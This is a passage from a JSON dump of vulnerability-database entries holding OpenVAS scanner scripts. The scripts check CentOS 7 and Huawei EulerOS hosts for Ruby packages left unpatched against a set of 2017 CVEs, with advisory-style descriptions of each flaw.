"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "Check the version of ruby", "modified": "2019-03-08T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310882847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882847", "type": "openvas", "title": "CentOS Update for ruby CESA-2018:0378 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_0378_ruby_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for ruby CESA-2018:0378 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882847\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 08:29:25 +0100 (Wed, 14 Mar 2018)\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\",\n \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\",\n \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ruby CESA-2018:0378 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ruby\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted,\nobject-oriented, scripting language. It has features to process text files and\nto perform system management tasks.\n\nSecurity Fix(es):\n\n * It was discovered that the Net::FTP module did not properly process\nfilenames in combination with certain operations. A remote attacker could\nexploit this flaw to execute arbitrary commands by setting up a malicious\nFTP server and tricking a user or Ruby application into downloading files\nwith specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\n * A buffer underflow was found in ruby's sprintf function. An attacker,\nwith ability to control its format string parameter, could send a specially\ncrafted string that would disclose heap memory or crash the interpreter.\n(CVE-2017-0898)\n\n * It was found that rubygems did not sanitize gem names during installation\nof a given gem. A specially crafted gem could use this flaw to install\nfiles outside of the regular directory. (CVE-2017-0901)\n\n * A vulnerability was found where rubygems did not sanitize DNS responses\nwhen requesting the hostname of the rubygems server for a domain, via a\n_rubygems._tcp DNS SRV query. An attacker with the ability to manipulate\nDNS responses could direct the gem command towards a different domain.\n(CVE-2017-0902)\n\n * A vulnerability was found where the rubygems module was vulnerable to an\nunsafe YAML deserialization when inspecting a gem. Applications inspecting\ngem files without installing them can be tricked to execute arbitrary code\nin the context of the ruby interpreter. (CVE-2017-0903)\n\n * It was found that WEBrick did not sanitize all its log messages. If logs\nwere printed in a terminal, an attacker could interact with the terminal\nvia the use of escape sequences. (CVE-2017-10784)\n\n * It was found that the decode method of the OpenSSL::ASN1 module was\nvulnerable to buffer underrun. An attacker could pass a specially crafted\nstring to the application in order to crash the ruby interpreter, causing a\ndenial of service. (CVE-2017-14033)\n\n * A vulnerability was found where rubygems did not properly sanitize gems'\nspecification text. A specially crafted gem could interact with the\nterminal via the use of escape sequences. (CVE-2017-0899)\n\n * It was found that rubygems could use an excessive amount of CPU while\nparsing a sufficiently long gem summary. A specially crafted gem from a gem\nrepository could freeze gem commands attempting to parse its summary.\n(CVE-2017-0900)\n\n * A buffer overflow vulnerability was found in the JSON extension of ruby.\nAn attacker with the ability to pass a specially crafted JSON input to the\nextension could use this flaw to ex ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"ruby on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:0378\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-March/022791.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-minitest\", rpm:\"rubygem-minitest~4.3.2~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-rake\", rpm:\"rubygem-rake~0.9.6~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14.1~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rubygems-devel\", rpm:\"rubygems-devel~2.0.14.1~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~2.0.0.648~33.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181248", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181248", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1248)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1248\");\n script_version(\"2020-01-23T11:18:47+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:18:47 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:18:47 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1248)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1248\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1248\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2018-1248 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The lazy_initialize function in lib/resolv.rb in Ruby through 2.4.3 uses Kernel#open, which might allow Command Injection attacks, as demonstrated by a Resolv::Hosts::new argument beginning with a '<pipe>' character, a different vulnerability than CVE-2017-17405. NOTE: situations with untrusted input may be highly unlikely.(CVE-2017-17790)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\nIt was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the inte ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS Virtualization 2.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.353~23.h7\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.353~23.h7\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.353~23.h7\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:39:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181066", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181066", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1066)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1066\");\n script_version(\"2020-01-23T11:11:17+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:11:17 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:11:17 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1066)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1066\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1066\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2018-1066 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\nA vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181067", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1067)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1067\");\n script_version(\"2020-01-23T11:11:28+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:11:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:11:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2018-1067)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1067\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1067\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2018-1067 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\nA vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191407", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191407", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1407)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1407\");\n script_version(\"2020-01-23T11:42:38+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:42:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:42:38 +0000 (Thu, 23 Jan 2020)\");\n 